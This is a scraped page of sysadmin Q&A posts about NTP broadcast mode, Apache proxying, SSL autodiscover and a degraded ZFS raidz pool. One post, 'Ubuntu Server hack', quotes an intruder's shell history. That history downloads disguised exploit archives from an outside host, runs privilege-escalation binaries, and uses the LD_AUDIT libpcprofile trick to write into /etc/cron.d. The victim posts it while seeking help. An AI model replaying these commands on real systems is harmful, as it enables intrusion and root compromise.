    The NTP deamon if often used in its simplest mode, which is client/server: you specify one or more server directives in your ntp.conf and your clients will use those servers. In addition to that, when you run your own NTP servers, it is good practice to peer them together, so if one of them looses connectivity to its upstream servers, it will get time from its peers. But NTPd can also work with broadcast and/or multicast distribution of time data, with the documentation stating: broadcast and multicast modes are intended for configurations involving one or a few servers and a possibly very large client population The documentation also says elsewhere: It is possible and frequently useful to configure a host as both broadcast client and broadcast server. A number of hosts configured this way and sharing a common broadcast address will automatically organize themselves in an optimum configuration based on stratum and synchronization distance. I can see one obvious administrative benefit: you don't have to manually specify and update your list of NTP servers in the clients ntp.conf, so to me it looks tempting to use broadcast mode even for a small client population (say 5+ clients with 3~4 servers). I expect network traffic to be a little higher with broadcasts instead of client/server associations, but given the usual gigabit ethernet LAN the impact should be negligible unless you have a very very large number of hosts in the same broadcast domain. At the end of the day, when should broadcast mode be used or avoided? Are there pros and cons I haven't seen?

    Read the article

  • Setup proxy with Apache 2.4 on Mac 10.8

    - by Aptos
    I have 1 application (Java) that running on my local machine (localhost:9000). I want to setup Apache as a front end proxy thus I used following configuration in the httpd.conf: <Directory /> #Options FollowSymLinks Options Indexes FollowSymLinks Includes ExecCGI AllowOverride All Order deny,allow Allow from all </Directory> Listen 57173 LoadModule proxy_module modules/mod_proxy.so <VirtualHost *:9999> ProxyPreserveHost On ServerName project.play ProxyPass / http://127.0.0.1:9000/Login ProxyPassReverse / http://127.0.0.1:9000/Login LogLevel debug </VirtualHost> ServerName localhost:57173 I change my vim /private/etc/hosts to: ## # Host Database # # localhost is used to configure the loopback interface # when the system is booting. Do not change this entry. ## 127.0.0.1 localhost 255.255.255.255 broadcasthost ::1 localhost fe80::1%lo0 localhost 127.0.0.1:9999 project.play and use dscacheutil -flushcache. The problem is that I can only access to localhost:57173, when I tried accessing http://project.play:9999, Chrome returns "Oops! Google Chrome could not find project.play:9999". Can somebody show me where I were wrong? Thank you very much P/S: When accessing localhost:9999 it returns The server made a boo boo.

    Read the article

  • Ubuntu Server hack

    - by haxpanel
    Hi! I looked at netstat and I noticed that someone besides me is connected to the server by ssh. I looked after this because my user has the only one ssh access. I found this in an ftp user .bash_history file: w uname -a ls -a sudo su wget qiss.ucoz.de/2010/.jpg wget qiss.ucoz.de/2010.jpg tar xzvf 2010.jpg rm -rf 2010.jpg cd 2010/ ls -a ./2010 ./2010x64 ./2.6.31 uname -a ls -a ./2.6.37-rc2 python rh2010.py cd .. ls -a rm -rf 2010/ ls -a wget qiss.ucoz.de/ubuntu2010_2.jpg tar xzvf ubuntu2010_2.jpg rm -rf ubuntu2010_2.jpg ./ubuntu2010-2 ./ubuntu2010-2 ./ubuntu2010-2 cat /etc/issue umask 0 dpkg -S /lib/libpcprofile.so ls -l /lib/libpcprofile.so LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping ping gcc touch a.sh nano a.sh vi a.sh vim wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh nano ubuntu10.sh ls -a rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2 ls -a wget qiss.ucoz.de/ubuntu10.sh sh ubuntu10.sh ls -a rm -rf ubuntu10.sh wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe rm -rf W2Ksp3.exe passwd The system is in a jail. Does it matter in the current case? What shall i do? Thanks for everyone!! I have done these: - ban the connected ssh host with iptables - stoped the sshd in the jail - saved: bach_history, syslog, dmesg, files in the bash_history's wget lines

    Read the article

  • Prevent SSL certificate being returned for a specific domain

    - by jezmck
    Apologies for a long question: We've taken on a new client whose web hosting was previously on their in-house server which still has their Exchange/Outlook email. We now host their domain (and many others) on our server. They're complaining that they're getting errors in Outlook. I don't understand the AutoDiscover stuff at the root of the problem, but believe that I just need to stop the SSL certificate on our server being returned when requested at a particular domain: Yes it is, the issue lies with "{newclient}.com" being pointed to your server IP and that server has Port 443 open with an SSL certificate associated to it. So when Outlook/ActiveSync use autodiscover to find the mailbox settings it find your SSL (because 443 is open) and flags it as an error. The solution is to close 443 so its not discovered, Autodiscover will then proceed to mail.{newclient}.com via the MX / ServiceRecords and discover the correct SSL. I'm new here and there was no hand-over, so I don't know whether other currently hosted sites need to accept SSL connections, though I suspect some will, or may in future. This is a live server, so I can't risk trying loads of options in case I take the server offline! I feel like I should be adding something like the following to vhosts.conf. <VirtualHost *:443> ServerName {newclient}.com ServerAlias www.{newclient}.com SSLEngine Off SSLCertificateFile {NONE} SSLCertificateKeyFile {NONE} </VirtualHost> Apologies for the fact that I don't know enough about this subject to be able to ask the question more clearly!

    Read the article

  • Raid-z unaccessible after putting one disk offline

    - by varesa
    I have installed FreeNAS on a test server, with 3x 1Tb drives. They are setup in raidz. I tried to offline one of the disks (from the FreeNAS web-ui), and the array became degraded, as I think it should. The problem is with the array becoming unaccessible after that. I thought a raid like that should be able to run fine with one of the disks missing. Atleast very soon after I offline'd and pulled out the disk, the iSCSI share disappeared from a ESXi host's datastores. I also ssh'd into the FreeNAS server, and tried just executing ls /mnt/raid (/mnt/raid/ being the mount point). The whole terminal froze, not accepting ^C or anything. # zpool status -v pool: raid state: DEGRADED status: One or more devices are faulted in response to IO failures. action: Make sure the affected devices are connected, then run 'zpool clear'. see: http://www.sun.com/msg/ZFS-8000-HC scrub: none requested config: NAME STATE READ WRITE CKSUM raid DEGRADED 1 30 0 raidz1 DEGRADED 4 56 0 gptid/c8c9e44c-08e1-11e2-9ba6-001b212a83ea ONLINE 3 60 0 gptid/c96f32d5-08e1-11e2-9ba6-001b212a83ea ONLINE 3 63 0 gptid/ca208205-08e1-11e2-9ba6-001b212a83ea OFFLINE 0 0 0 errors: Permanent errors have been detected in the following files: /mnt/raid/ raid/iscsivol:<0x0> raid/iscsivol:<0x1> Have I understood the workings of a raidz wrong, or is there something else going on? It would not be nice to have the same thing happen on a production system...

    Read the article

< Previous Page | 489 490 491 492 493 494 495 496 497 498 499 500  | Next Page >